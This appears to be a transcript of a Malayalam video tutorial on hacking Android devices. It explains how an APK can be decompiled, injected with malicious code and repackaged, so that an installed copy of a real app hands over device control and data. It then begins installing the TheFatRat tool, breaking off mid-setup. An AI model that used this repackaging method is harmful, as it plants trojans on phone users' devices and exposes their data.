ആൻഡ്രോയിഡ് ഹാക്കിംഗ് ഒരുപാട് പേര് ചോദിക്കുന്ന ഒരു ചോദ്യമാണ്. ആൻഡ്രോയിഡ് ഡിവൈസുകൾ നമുക്ക് ഹാക്ക് ചെയ്യാൻ കഴിയുമോ ഇല്ലയോ എന്നൊരു കാര്യം. ഓക്കെ, അതിനൊരു ഉത്തരമാണ് ഞാൻ ഇന്ന് ഈ ഒരു വീഡിയോ ചെയ്യുന്നത്. ആൻഡ്രോയിഡ് ഹാക്കിംഗ് എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ ആൻഡ്രോയിഡ് പ്ലാറ്റ്ഫോമുകൾ അല്ലെങ്കിൽ മൊബൈൽ ആപ്ലിക്കേഷൻ, മൊബൈൽ ഡിവൈസുകൾ നമുക്ക് ഹാക്ക് ചെയ്യാൻ പറ്റുമോ എന്നുള്ളതാണ്. ഓക്കെ, അപ്പൊ മൊബൈൽ ഡിവൈസുകൾ ഹാക്ക് ചെയ്യാൻ നമ്മൾ ഒരുപാട് മെത്തേഡുകൾ നമ്മൾ യൂസ് ചെയ്യുന്നുണ്ട്. അതിലെ ഒരു പ്രധാനപ്പെട്ട ഒരു മെത്തേഡാണ് അപ്ലിക്കേഷൻ റീപാക്കേജിംഗ് എന്ന് പറയുന്നത്. ഓക്കെ, നമ്മളുടെ കയ്യിൽ നമുക്കറിയാം ഒരുപാട് അപ്ലിക്കേഷൻസുകൾ നമ്മൾ യൂസ് ചെയ്യുന്നുണ്ട്. വാട്സപ്പ്, ഇൻസ്റ്റാഗ്രാം, അതേപോലെ തന്നെ നമ്മൾ സ്പോട്ടിഫൈ പോലെയുള്ള അപ്ലിക്കേഷൻസുകൾ നമ്മൾ യൂസ് ചെയ്യുന്നുണ്ട്. ഒരുപാട് അപ്ലിക്കേഷൻസുകൾ നമ്മൾ യൂസ് ചെയ്യുന്നുണ്ട്. അപ്പൊ ആൻഡ്രോയിഡ് ഉപയോക്താക്കൾ എങ്ങനെയാണ് ഈ അപ്ലിക്കേഷൻസുകൾ യൂസ് ചെയ്യുന്നത്? ഇതിന്റെ APK ഫയൽ ഇൻസ്റ്റാൾ ചെയ്തിട്ടോ അല്ലെങ്കിൽ ഗൂഗിൾ പ്ലേ സ്റ്റോറിൽ നിന്ന് ഡയറക്റ്റ് ആയിട്ട് ഇൻസ്റ്റാൾ ചെയ്തിട്ടുമാണ് ഈ അപ്ലിക്കേഷൻസുകൾ നമ്മൾ യൂസ് ചെയ്യുന്നത്. ഓക്കെ, അപ്പൊ APK ഫയലുകൾ നമ്മൾ ജെനുവിൻ ആയ സ്ഥലങ്ങളിൽ നിന്നാണ് നമ്മൾ ഇൻസ്റ്റാൾ ചെയ്യുന്നത്. ഒന്നില്ലെങ്കിൽ പ്ലേ സ്റ്റോറിൽ നിന്ന് അല്ലെങ്കിൽ ജെനുവിൻ പ്ലാറ്റ്ഫോമുകളിൽ നിന്ന്, വെബ്സൈറ്റുകളിൽ നിന്നൊക്കെയാണ് നമ്മൾ എന്ത് ചെയ്യുന്നത്, ഈ APK ഫയലുകൾ ഇൻസ്റ്റാൾ ചെയ്യുന്നത്. ഓക്കെ, അപ്പം ഈ APK ഫയൽ എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ, ഓക്കെ, ഒരു അപ്ലിക്കേഷന്റെ പ്രധാനപ്പെട്ട ഫയൽ നമ്മൾ APK ഫയൽ എന്ന് പറയും. ഈ APK ഫയൽ എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ അത് എന്താണ്? ഒരു ആൻഡ്രോയിഡ് കോഡും അല്ലെങ്കിൽ അതേപോലെ ജാവ കോഡും അല്ലെങ്കിൽ കോട്ട്ലിനും XML ഇതൊക്കെ ബൈൻഡ് ചെയ്ത്, ഇത് മാത്രമല്ല അവിടെ കുറെ പാക്കേജുകൾ യൂസ് ചെയ്യുന്നുണ്ട്, റിസോഴ്സുകൾ യൂസ് ചെയ്യുന്നുണ്ട്, മീഡിയ ഫയലുകൾ യൂസ് ചെയ്യുന്നുണ്ട്. അങ്ങനെ ഒരുപാട് കാര്യങ്ങളെ കമ്പൈൻ ചെയ്ത് വെച്ചിരിക്കുന്ന ഒരു റണ്ണബിൾ ആയിട്ടുള്ള അല്ലെങ്കിൽ കമ്പൈൽ ചെയ്ത് വെച്ചിരിക്കുന്ന ഒരു ഫയലാണ് APK ഫയൽ എന്ന് പറയുന്നത്. നമ്മൾ ആ ഒരു APK ഫയലാണ് ഇൻസ്റ്റാൾ ചെയ്യുന്നത്. അപ്പൊ അതിൻ്റെതായ കോഡുകളും കാര്യങ്ങളും ഒക്കെ അതിൽ ഇൻസ്റ്റാൾ സെറ്റ് ചെയ്ത് വെച്ചിട്ടുണ്ട്. ആ ഫയൽ നമ്മൾ ഇൻസ്റ്റാൾ ചെയ്താൽ മതി. അപ്പൊ അതിനെ റൺ ചെയ്യാൻ പറ്റുന്ന ഫയൽ എന്ന് പറഞ്ഞാൽ കമ്പൈൽ ചെയ്ത ഫയലാണ് എന്ത് ചെയ്യുന്നത്, APK ഫയൽ എന്ന് പറയുന്നത്. ഓക്കെ, ഇനി ഈ APK ഫയലാണ് നമ്മൾ നോർമലി നമ്മുടെ ഡിവൈസുകളിലൊക്കെ അല്ലെങ്കിൽ നമ്മുടെ ആൻഡ്രോയിഡ് ഡിവൈസുകളിലൊക്കെ നമ്മൾ ഇൻസ്റ്റാൾ ചെയ്യുന്നത്. ഓക്കെ, അപ്പൊ ഒരാൾ വിചാരിച്ചു കഴിഞ്ഞാൽ, ഒരു ഡെവലപ്പർ വിചാരിച്ചു കഴിഞ്ഞാൽ അയാൾക്ക് എന്ത് ചെയ്യാൻ പറ്റും, ഒരു APK ഫയൽ ക്രിയേറ്റ് ചെയ്യാൻ പറ്റും. ഓക്കെ, ആൻഡ്രോയിഡ് പ്രോഗ്രാമിങ്ങും അതേപോലെ കോഡ്ലിനും ജാവയൊക്കെ അറിയുന്ന ഒരാൾക്ക്, ആൻഡ്രോയിഡ് അല്ലെങ്കിൽ ഫ്ലട്ടർ ഡെവലപ്പർ, അവർക്കൊക്കെ എന്ത് ചെയ്യാൻ പറ്റും, ഒരു ഇതേപോലെയുള്ള ഒരു APK ക്രിയേറ്റ് ചെയ്യാൻ പറ്റും. അപ്പൊ അവരെന്താണ് ചെയ്യുന്നത്, അവരുടെ കയ്യിലുള്ള സ്കില്ല് ഉപയോഗിച്ചുകൊണ്ട് അവരൊരു പ്രൊഡക്റ്റ് ഉണ്ടാക്കുന്നു. അപ്പൊ ഇതൊരു എഞ്ചിനീയറിംഗ് എന്നാണ് നമ്മൾ അതിനെ പറയുന്നുണ്ടാവുക. ഓക്കെ, അപ്പൊ അവിടെ എന്താണ് അവർ ചെയ്യുന്നത്, ഒരു പ്രൊഡക്റ്റ് ഉണ്ടാക്കുന്നു, ഒരു APK ഫയൽ ഉണ്ടാക്കുന്നു. അപ്പൊ നമുക്ക് എന്ത് ചെയ്യാം, ഒരു സോഫ്റ്റ്വെയർ എഞ്ചിനീയേഴ്സ് എന്ന് പറയാം. ഓക്കെ, അപ്പൊ ഒരു ആൻഡ്രോയിഡ് പ്രോഗ്രാം ഉണ്ടായിക്കോട്ടെ, അല്ലെങ്കിൽ മറ്റ് നമ്മൾ വെബ് പേജ് ഉണ്ടാക്കുന്നവരായാലും മറ്റ് സോഫ്റ്റ്വെയറുകൾ ഉണ്ടാക്കുന്നവരൊക്കെ നമ്മൾ എന്താണ് സോഫ്റ്റ്വെയർ എഞ്ചിനീയേഴ്സ് ഒക്കെ പറയാറുണ്ട്. അവരെന്താണ് ചെയ്യുന്നത്, ഒരു APK ഫയൽ ഉണ്ടാക്കിയെടുക്കുന്നു. അപ്പൊ അവരെ നമുക്ക് എന്ത് പറയാം, എഞ്ചിനീയേഴ്സ് എന്ന് പറയാം. ഓക്കെ, അങ്ങനെ അവർ ഉണ്ടാക്കി വെച്ചിരിക്കുന്ന APK ഫയൽസ് ആണ് നമ്മൾ എന്ത് ചെയ്യുന്നത്, യൂസ് ചെയ്യുന്നത്. ഓക്കെ, ഇനി ഈ ഉണ്ടാക്കി വെച്ചിരിക്കുന്ന APK ഫയൽ അത് വെച്ചിട്ടാണ് നമ്മളുടെ ആപ്ലിക്കേഷൻ ഒക്കെ റൺ ആവുന്നത് ആണല്ലോ. ഇനി നമ്മൾ എന്ത് ചെയ്യുന്നു, ഈ ഒരു APK ഫയലിനെ തിരിച്ച് നമുക്ക് എന്താക്കി മാറ്റാം, കോഡാക്കി മാറ്റാം. ഓക്കെ, തിരിച്ച് അതിന് നമ്മൾ ബൈൻഡ് ചെയ്ത് വെച്ചിരിക്കുന്ന ആ APK ഫയലിനെ നമുക്ക് തിരിച്ച് എന്താക്കി മാറ്റാം, അതൊരു കോഡാക്കി മാറ്റിയെടുക്കാൻ പറ്റും. ഓക്കെ, ഫോർ എക്സാമ്പിൾ നമ്മളിപ്പോ ഒരു വാട്സപ്പിന്റെ അല്ലെങ്കിൽ ഇൻസ്റ്റഗ്രാമിന്റെ, ഓക്കെ, ഇതിന്റെ ഒക്കെ കോഡുകൾ നമ്മൾ എന്ത് ചെയ്യുന്നു, APK ഫയൽ നമ്മളുടെ കയ്യിലുണ്ട്. നമുക്ക് എന്ത് ചെയ്യാം, ആ APK ഫയലിനെ ഡീകമ്പൈൽ ചെയ്തുകൊണ്ട് തിരിച്ച് എന്താക്കി മാറ്റാം, കോഡ്, നേരത്തെ നമ്മൾ പറഞ്ഞല്ലോ, കോഡും റിസോഴ്സുകളും ലൈബ്രറികളും എല്ലാം ബൈൻഡ് ചെയ്തതാണ് APK ഫയൽ. തിരിച്ച് അതിന് എന്താക്കി തന്നെ മാറ്റിയെടുക്കാൻ പറ്റും, ഈ കോഡും റിസോഴ്സുകളും ലൈബ്രറീസും അതേപോലെ ജാവ കോഡോ കോട്ട്ലിൻ കോഡോ XML കോഡോ ഒക്കെ മാറ്റി തിരിച്ചെടുക്കാൻ പറ്റും. ഓക്കെ, ആ പ്രോസസ്സിനെയാണ് നമ്മൾ റിവേഴ്സ് എഞ്ചിനീയറിംഗ് എന്ന് പറയുന്നത്. റിവേഴ്സ് എഞ്ചിനീയറിംഗ്, കാരണം എഞ്ചിനീയറിംഗ് എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ നമ്മൾ എന്താ കല്ലും മണലും സിമെന്റ് ഒക്കെ ഉപയോഗിച്ചാണ് നമ്മൾ ഒരു വീട് ഉണ്ടാക്കുന്നു, അത് എഞ്ചിനീയറിംഗ്, സിവിൽ എഞ്ചിനീയറിംഗ്. ഓക്കെ, ഒരുത്തം വന്നിട്ട് എന്ത് ചെയ്തു, അതൊക്കെ പൊളിച്ചിട്ട് എന്താ ഈ കല്ലും മണലും ആക്കി വീണ്ടും അതിനെ മാറ്റിയെടുക്കുന്നു. ഓക്കെ, കല്ലും മണലാക്കി വേറെ വേറെ തരംതിരിക്കുന്നു. അതിനെ നമ്മൾ എന്താ പറയാ, റിവേഴ്സ് എഞ്ചിനീയറിംഗ് എന്ന് പറയും. ഓക്കെ, എന്നിട്ട് നമുക്ക് വേണമെന്നുണ്ടെങ്കിൽ നമുക്ക് അങ്ങനെ ഏതെങ്കിലും ഒരു അപ്ലിക്കേഷന്റെ കോഡുകളൊക്കെ എടുത്ത് പഠിക്കാം. നമുക്ക് എന്ത് ചെയ്യണം, ആ വാട്സപ്പിന്റെ ഉള്ളിൽ കോഡ് എങ്ങനെയാണ് വർക്ക് ചെയ്യുന്നത്, അല്ലെങ്കിൽ നേരത്തെ പറഞ്ഞ പോലെ സ്പോട്ടിഫൈന്റെ കോഡ് എങ്ങനെയാണ് വർക്ക് ചെയ്യുന്നത്, അതൊക്കെ അറിയണമെന്നുണ്ടെങ്കിൽ നമുക്ക് എന്ത് ചെയ്യാം, അതിന്റെ APK ഫയലിനെ റിവേഴ്സ് എഞ്ചിനീയറിംഗ് വഴി കോഡാക്കി മാറ്റിയെടുത്തിട്ട് ആ കോഡ് നമുക്ക് വായിച്ച് മനസ്സിലാക്കാൻ പറ്റും. ഓക്കെ, അപ്പൊ അതാണ് റിവേഴ്സ് എഞ്ചിനീയറിംഗ് എന്ന് പറയുന്നത്. അതും ഈ സൈബർ സെക്യൂരിറ്റിയും തമ്മിൽ എങ്ങനെയാണ് ബന്ധം എന്നുള്ളത് അതാണ് ഈ നമ്മൾ പറഞ്ഞു വരുന്നത്. അതിനു വേണ്ടിയിട്ട് ഒന്ന് ആലോചിച്ച് നോക്കുക, ഇതുപോലെ നമുക്ക് ഒരു ജെനുവിൻ അപ്ലിക്കേഷനെ APK ഫയലിന് തിരിച്ച് എന്താക്കി എടുക്കാൻ പറ്റും, അൺബൈൻഡ് ചെയ്തുകൊണ്ട് അല്ലെങ്കിൽ ഡീകമ്പൈൽ ചെയ്തുകൊണ്ട് കൂൾ ആക്കി എടുക്കാൻ പറ്റും. എന്നിട്ട് എനിക്ക് അവിടെ എന്ത് ചെയ്യാൻ പറ്റും, ആ കോഡുകൾ കിട്ടിയല്ലോ, ആ കോഡിലേക്ക് എനിക്ക് മലീഷ്യസ് കോഡ് ആഡ് ചെയ്യാൻ പറ്റും അല്ലെങ്കിൽ മാൽവെയറിനെ എനിക്ക് ആഡ് ചെയ്യാൻ പറ്റും.
ഓക്കെ. ദെൻ അതിനുശേഷം ഞാൻ എന്ത് ചെയ്യും, തിരിച്ച് അതിന് വീണ്ടും ബൈൻഡ് ചെയ്ത് APK ഫയൽ തന്നെയാക്കും. അപ്പം ഞാൻ എന്ത് ചെയ്തു, ഒരു സ്പോട്ടിഫൈ ആപ്ലിക്കേഷനെ ഞാൻ എന്ത് ചെയ്യുന്നു, അതിനെ ഡീകമ്പൈൽ ചെയ്തുകൊണ്ട് അതിനെ കോഡാക്കി മാറ്റുന്നു. അതിലേക്ക് ഞാൻ എൻ്റെ വക കുറച്ച് മലീഷ്യസ് കോഡുകൾ, മാൽവെയറുകൾ, ഓക്കെ, മാൽവെയർ കോഡുകൾ ഞാൻ ഇഞ്ചക്ട് ചെയ്തുകൊണ്ട് തിരിച്ച് വീണ്ടും ഞാൻ അതിനെ എന്താ പറയാ, കമ്പൈൽ ചെയ്ത് വീണ്ടും അതിനെ APK ഫയലിനാക്കി മാറ്റും. അപ്പൊ APK ഫയലിനെ ഡീകമ്പൈൽ ചെയ്ത് കോഡാക്കി മാറ്റി, കോഡിലേക്ക് വീണ്ടും ഞാൻ എക്സ്ട്രാ കോഡുകൾ ആഡ് ചെയ്തിട്ട് വീണ്ടും അതിനെ ബൈൻഡ് ചെയ്ത് APK ഫയൽ തന്നെയാക്കി. ഇനി ഞാൻ ആ ആപ്ലിക്കേഷനാണ് നമ്മൾ എന്ത് പറയുന്നത്, അപ്ലിക്കേഷൻ റീപാക്കേജ് എന്ന് പറയുന്നത്. രണ്ടാമത് പാക്കേജ് ചെയ്തു. ആദ്യം അപ്ലിക്കേഷൻ പാക്കേജ് ആയിട്ട് വന്ന ഒരു അപ്ലിക്കേഷൻ നമ്മൾ എന്ത് ചെയ്തു, വീണ്ടും അതിനെ കോഡാക്കി മാറ്റി അതിൽ കുറച്ച് കോഡുകൾ നമ്മളുടെ വക ആഡ് ചെയ്ത് കൊടുത്ത് അതിന് വീണ്ടും ബൈൻഡ് ചെയ്ത് വീണ്ടും അതിനെ റീപാക്കേജ് ചെയ്തു. ഓക്കെ. ഇപ്പൊ ആ അപ്ലിക്കേഷൻ എന്ന് പറഞ്ഞു കഴിഞ്ഞാൽ എന്താണ്, ജെനുവിനായ ആപ്ലിക്കേഷൻ അതിന്റെ ഉള്ളിലുണ്ട്, അതുപോലെ തന്നെ നമ്മൾ ആഡ് ചെയ്ത് കൊടുത്ത ആ കുറച്ച് മലീഷ്യസ് കോഡുകളും ആ ഒരു ആപ്ലിക്കേഷന്റെ ഉള്ളിലുണ്ട്. ഓക്കെ. ഇനി ഞാൻ എന്ത് ചെയ്യാം, ഈ ആപ്ലിക്കേഷൻ നമ്മളുടെ ആരുടെയെങ്കിലും ഫോണിൽ ഇൻസ്റ്റാൾ ആയി കഴിഞ്ഞാൽ, ഓക്കെ, ആ ആപ്ലിക്കേഷൻ നോർമൽ ആയിട്ട് വർക്ക് ആവും. അതിന്റെ കൂടെ എന്തുകൂടി വർക്ക് ആവും, നമ്മൾ ആ ആഡ് ചെയ്ത് കൊടുത്തിട്ടുള്ള ആ എക്സ്ട്രാ മലീഷ്യസ് കോഡും കൂടി അവിടെ റൺ ആവും. ഓക്കെ. അപ്പൊ ഇങ്ങനെ നടക്കുന്ന അറ്റാക്കുകൾ ഇതുവഴി നമുക്ക് എന്ത് ചെയ്യാം, ഒരു ആൻഡ്രോയിഡ് ഡിവൈസിനെ കൺട്രോൾ ചെയ്യാൻ പറ്റും. ആൻഡ്രോയിഡ് ഡിവൈസിലൂടെ നടക്കുന്ന ഡാറ്റാസുകൾ നമുക്ക് റീഡ് ചെയ്യാൻ പറ്റും, അല്ലെങ്കിൽ അതിലേക്ക് നമുക്ക് ആക്സസ് കിട്ടും. ഓക്കെ. അതുവഴി നമുക്കൊരു ആൻഡ്രോയിഡ് ഹാക്കിംഗ് നമുക്ക് കംപ്ലീറ്റ് ചെയ്യാൻ പറ്റും. ഓക്കെ. അതാണ് നമ്മൾ ഇന്നിവിടെ ഡിസ്കസ് ചെയ്യുന്നത്. ഓക്കെ. അപ്പൊ അതിന് വേണ്ടിയിട്ട് നമ്മൾ ഫസ്റ്റ് നമുക്ക് എന്ത് വേണം, അതിനൊരു ടൂൾ വേണം. ആ ടൂളിന്റെ പേരാണ് ഫാറ്റ് റാറ്റ് എന്ന് പറയുന്നത്. ഫസ്റ്റ് നമ്മൾ എന്ത് ചെയ്യണം, ആ ഒരു ഫാറ്റ് റാറ്റ് ടൂള് ഡൗൺലോഡ് ചെയ്യണം. ഫാറ്റ് റാറ്റിന്റെ GitHub പേജിലേക്ക് പോവാം. നമ്മൾ ഡയറക്റ്റ് ടെർമിനൽ വഴി ഇൻസ്റ്റാൾ ചെയ്യാൻ പറ്റില്ല. GitHub പേജിലേക്ക് പോവാം. ഓക്കെ. ദെൻ ഇവിടെ കോഡ് നമുക്ക് കാണാൻ പറ്റുന്നുണ്ട്. അത് git ക്ലോൺ ചെയ്യാം. ഓക്കെ. അത് git ക്ലോൺ ചെയ്തെടുത്തു. git ക്ലോൺ ചെയ്യുന്നത് എന്തിനാണെന്ന് അറിയാലോ, GitHubൽ നിന്ന് ആ ഒരു പ്രൊജക്ട് നമ്മൾ എന്ത് ചെയ്യണം, ഡൗൺലോഡ് ചെയ്ത് വെക്കുകയാണ്. ഓക്കെ. GitHub പേജിൽ നമ്മൾ ആ പ്രൊജക്ട്, ആ ഫോൾഡറുകൾ കാണുന്നുണ്ട്. ഓക്കെ. ഇതാണ് ആ ടൂൾ റൺ ചെയ്യാൻ വേണ്ട ഡിപ്പെൻഡൻസീസും അതിന് വേണ്ട റിക്വയർമെന്റ്സ് ആയിട്ടുള്ള ഫയലുകളും അതിന്റെ കോഡുകളൊക്കെയാണ് ഈ കാണുന്നത്. ഇത് മൊത്തം നമ്മൾ എന്ത് ചെയ്താണ്, അതിന്റെ പാത്ത് നമ്മൾ ഇവിടെ നിന്ന് കോപ്പി ചെയ്തു. ദെൻ git ക്ലോൺ ചെയ്ത് കഴിഞ്ഞാൽ നമുക്ക് എന്ത് ചെയ്യാം, ആ ഫയലുകളൊക്കെ ഇവിടെ നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് ഡൗൺലോഡ് ആവും. ഓക്കെ. നമ്മൾ ഓരോന്ന് പോയി ഡൗൺലോഡ് ചെയ്യേണ്ട ആവശ്യമില്ല. ഈ കാണുന്ന ഫോൾഡറുകളും ഈ കാണുന്ന ഫയലുകളും എല്ലാം ഒരുമിച്ച് ഡൗൺലോഡ് ചെയ്യാൻ നമ്മൾ എന്ത് ചെയ്താൽ മതി, അതിന്റെ പാത്ത് കോപ്പി ചെയ്യാം. പാത്ത് ഇവിടുന്ന് കോപ്പി ചെയ്യാം. ദെൻ ഇവിടെയും നമുക്ക് കാണാൻ പറ്റും, പാത്ത് ഇവിടെ കാണാൻ പറ്റുന്നുണ്ട്. പാത്ത് കോപ്പി ചെയ്യാം. ദെൻ ഇവിടെ വന്നിട്ട് ഗിറ്റ് സ്പേസ് ക്ലോൺ എന്ന് പറഞ്ഞിട്ട് ആ പാത്ത് കൊടുത്തു കഴിഞ്ഞാൽ അവിടെയുള്ള മൊത്തം ഫയൽസുകൾ നമുക്ക് ഇവിടെ ഡൗൺലോഡ് ചെയ്യാൻ പറ്റും. ഓക്കെ. GitHub അറിയാലോ, നമ്മൾ ഇതുപോലെയുള്ള പ്രൊജക്റ്റുകളൊക്കെ സേവ് ചെയ്ത് വെക്കാൻ വേണ്ടിയിട്ടും പ്രൊജക്റ്റുകൾ സേവ് ചെയ്ത് വെക്കാനും സ്റ്റോർ ചെയ്ത് വെക്കാനൊക്കെ വേണ്ടി യൂസ് ചെയ്യുന്ന പ്ലാറ്റ്ഫോമാണ് GitHub. അതുവഴി നമുക്ക് മറ്റുള്ളവർക്ക് ഷെയർ ചെയ്ത് കൊടുക്കാം. അതേപോലെ ഇവിടെ ഒരു ക്രിയേറ്റ് ചെയ്ത് വെച്ചിരിക്കുന്നതാണ്. ഇവിടെ ക്രിയേറ്റ് ചെയ്ത് വെച്ചിരിക്കുന്ന അത് കോൺട്രിബ്യൂട്ടേഴ്സ് ആൾക്കാരെ ഇവിടെ കാണാൻ പറ്റും. അവർ ക്രിയേറ്റ് ചെയ്ത് വെച്ചിരിക്കുന്ന ഒരു പ്രൊജക്റ്റ് ആണ് ഇത്. അത് നമ്മൾ എന്ത് ചെയ്യുന്നു, ഇങ്ങോട്ട് ഗിറ്റ് ക്ലോൺ ചെയ്തെടുക്കുന്നു. ഓക്കെ. അപ്പൊ നമ്മൾ എന്ത് ചെയ്തു, അതിവിടെ ഡൗൺലോഡ് ചെയ്ത് വെച്ചു. ദെൻ അതിന്റെ ഫോൾഡറിലേക്ക് നമ്മൾ ആക്സസ് ചെയ്യാണ്, അല്ലെങ്കിൽ മൂവ് ചെയ്യാണ്. ദി ഫാറ്റ് റാറ്റ് എന്ന് പറയുന്ന ഒരു ഫോൾഡർ. ഓക്കെ. അപ്പൊ അവിടെയുള്ള എല്ലാ ഫയലുകളും എന്ത് ചെയ്യുന്നുണ്ട്, നമ്മൾ ഈ ഒരു കമ്പ്യൂട്ടറിലേക്ക് ഡൗൺലോഡ് ചെയ്തു. ഇങ്ങനെ ഒരു ടൂൾ നിങ്ങൾ ഇതേപോലെ ഗിറ്റ് ക്ലോൺ ചെയ്ത് കഴിഞ്ഞാൽ അതിന്റെ ഫർദർ പ്രോസസ് എന്താണെന്ന് സംശയം ഉണ്ടെന്നുണ്ടെങ്കിൽ ഇവിടെ ഒരു റീഡ്മി ഫയൽ ഉണ്ടാവും. ഓക്കെ. അവിടെ അതിൽ പറയുന്നുണ്ടാവും അത് എങ്ങനെ യൂസ് ചെയ്യണം എന്നുള്ള കാര്യമൊക്കെ ഈ ഒരു ഫയലിനുള്ളിൽ വ്യക്തമായിട്ട് കൊടുത്തിട്ടുണ്ടാവും. അതെങ്ങനെ യൂസ് ചെയ്യണം, അല്ലെങ്കിൽ അതെങ്ങനെ ഇൻസ്റ്റാൾ ചെയ്യണം എന്നുള്ള പ്രോസസ് ഒക്കെ അവരിവിടെ ഒരു രീതിയിൽ കൊടുത്തിട്ടുണ്ട്. കണ്ടോ, ഇവിടെ അവർ പറഞ്ഞിട്ടുണ്ട് അതെങ്ങനെ ഇൻസ്റ്റാളേഷൻ. കണ്ടോ, ഗിറ്റ് ക്ലോൺ ചെയ്യാം. ദെൻ ആ ഫയലിലേക്ക് പോവുക. ദെൻ ഇവിടെ ഈ ഒരു കമാൻഡ് കൊടുക്കുക, ഈ ഒരു കമാൻഡ് റൺ ചെയ്യുക എന്ന് പറഞ്ഞിട്ടുണ്ട്. ഓക്കെ. നമ്മൾ എന്ത് ചെയ്തു, ആ കമാൻഡ് കോപ്പി ചെയ്യുന്നു. ഓക്കെ. അപ്പൊ ഏതൊരു ഫയൽ ഇൻസ്റ്റാൾ ചെയ്യാനാണെന്നുണ്ടെങ്കിലും ഡൗട്ട് അടിക്കണ്ട, അതിന്റെ റീഡ്മി ഫയലിൽ ഉണ്ടാകും. അല്ലെങ്കിൽ മിക്കവാറും പ്ലാറ്റ്ഫോമിൽ അവർ എന്ത് ചെയ്യാറുണ്ട്, ഈ പറയുന്ന GitHub പേജിൽ തന്നെ അതിന്റെ ഇൻസ്റ്റാളേഷൻ കമാൻഡ്സുകൾ അവർ കൊടുക്കാറുണ്ട്. കണ്ടോ, ഇവിടെയും നമുക്ക് കാണാൻ പറ്റുന്നുണ്ട് ഇൻസ്റ്റാളേഷൻ എങ്ങനെ ചെയ്യണം എന്നുള്ളതൊക്കെ. ഓക്കെ. ഇവിടെ അവർ പറയുന്നുണ്ട് അടുത്തത് ഈ ഒരു കമാൻഡ് ആണ് റൺ ചെയ്യേണ്ടത്. ഓക്കെ. അപ്പൊ നമ്മൾ എന്ത് ചെയ്യുന്നു, ആ ഒരു ഫയലിൽ നമ്മൾ വന്നിട്ടുണ്ട്. CD ദി ഫാറ്റ് റാറ്റ് എന്ന് പറഞ്ഞ ഫയലിലാണ് നമ്മൾ നിൽക്കുന്നത്. PWD അടിച്ച് നോക്കാം. ഓക്കെ. ദി ഫാറ്റ് റാറ്റിലാണ് നിൽക്കുന്നത്. ഇനി ഞാൻ എന്ത് ചെയ്യുന്നു, ആ ഒരു കമാൻഡ് റൺ ചെയ്യുന്നു.
ഓക്കെ, അത് റൺ ചെയ്യണമെന്നുണ്ടെങ്കിൽ സുഡോ യൂസർ ആയിരിക്കണം, സൂപ്പർ യൂസർ ആയിരിക്കണം എന്ന് പറയുന്നുണ്ട്. മീൻസ് ഓക്കെ, ഞാൻ സുഡോ കൊടുത്തിട്ടുണ്ട്. അപ്പൊ എന്താ ചെയ്യുന്നത്? എന്തുകൊണ്ട് സുഡോ ചോദിച്ചു എന്ന് കൊടുക്കേണ്ടി വന്നു എന്ന് പറഞ്ഞാൽ സെറ്റപ്പ് ഡോട്ട് SH അതൊരു ബാഷ് ഫയലാണ്. ഓക്കെ, ബാഷ് ഫയലുകൾ നമ്മൾ റൺ ചെയ്യുന്നത് ഒന്നില്ലെങ്കിൽ // ആ ബാഷ് ഫയലിന്റെ പേര് കൊടുക്കാം, അത് ഇൻസ്റ്റാളേഷൻ ഫയലാണ് കേട്ടോ, അങ്ങനെ കൊടുക്കാം. അല്ലെങ്കിൽ നമുക്ക് // എന്ന് പറഞ്ഞിട്ട് കൊടുക്കാം, അല്ലെങ്കിൽ ബാഷ് സ്പേസ് setup.sh എന്ന് പറഞ്ഞിട്ടും അത് റൺ ചെയ്യാം. ശരിക്കും അത് റൺ ചെയ്യുന്നത് അങ്ങനെയാണ്, ബാഷ് സ്പേസ് setup.sh. ഓക്കെ, അപ്പൊ ഇതിന്റെ ഉള്ളിൽ ഇത് ഇൻസ്റ്റാൾ ചെയ്യാനുള്ള കാര്യങ്ങളൊക്കെ ഉണ്ട്. അപ്പൊ ഇൻസ്റ്റാളേഷൻ ഒക്കെ നടത്തണമെന്നുണ്ടെങ്കിൽ നമ്മൾ ആരായിട്ട് മാറണം? റൂട്ട് പ്രിവിലേജ് ഉണ്ടെങ്കിൽ മാത്രമേ നമുക്കത് ചെയ്യാൻ പറ്റുള്ളൂ. അതുകൊണ്ടാണ് നമ്മൾ എന്ത് ചെയ്തത്? റൂട്ട് പ്രിവിലേജ് ആവാൻ വേണ്ടി ഒന്നില്ലെങ്കിൽ നമ്മൾ റൂട്ട് യൂസർ ആവണം, അല്ലെങ്കിൽ സുഡോ എന്നുള്ള കമാൻഡ് മുന്നേ ചേർക്കണം. ഓക്കെ, ദെൻ ഇവിടെ എന്താണ് തൊട്ട് മുന്നേ ചെയ്തത്? എന്താണ്? chmod. അതിന് ഈ ഒരു ഫയൽ ഉണ്ടായിരുന്നല്ലോ, ഇവിടെ ഒരു .sh ഫയൽ ഉണ്ട്, അതിന്റെ പേരാണ് setup.sh എന്ന് പറയുന്ന ഇൻസ്റ്റാളേഷൻ ഫയൽ ഉണ്ട്. ആ ഒരു ഫയലിന് നമ്മൾ എക്സിക്യൂഷൻ പെർമിഷൻ കൊടുത്തതാണ് നമ്മൾ എന്ത് ചെയ്തത്? ഈ പറയുന്ന chmod +x എന്ന് പറഞ്ഞു കൊടുത്തത്. ഓക്കെ, അപ്പം ഇവിടെ ഇൻസ്റ്റാളേഷൻ നടക്കുന്നുണ്ട്, ഓരോരോ കാര്യങ്ങൾ അവർ ചെക്ക് ചെയ്ത് നോക്കുന്നുണ്ട്, എന്റെ കമ്പ്യൂട്ടറിൽ അതുണ്ടോ ഇതുണ്ടോ എന്നൊക്കെ ചോദിക്കുന്നുണ്ട്. ഇല്ലാത്തത് ഇപ്പൊ കണ്ടോ, ഇവിടെ ഏതൊരു ടൂൾ ഇല്ല, ഇല്ലാത്തത് ഉണ്ടെങ്കിൽ അവർ അത് ഇൻസ്റ്റാൾ ചെയ്യണമെന്ന് ചോദിക്കുന്നുണ്ട്. ഞാൻ യെസ് കൊടുത്തു. ഓക്കെ, അപ്പൊ എന്ത് ചെയ്യും? ആ ഒരു ഫയലും കാര്യങ്ങളൊക്കെ എന്റെ കമ്പ്യൂട്ടറിലേക്ക് ഇൻസ്റ്റാൾ ആവുന്നുണ്ട്. എന്ന് പറഞ്ഞാൽ ഇതിന്റെ റിക്വയർമെന്റ്സ് ആണ്, ഈ FAT-RAT ടൂൾ റൺ 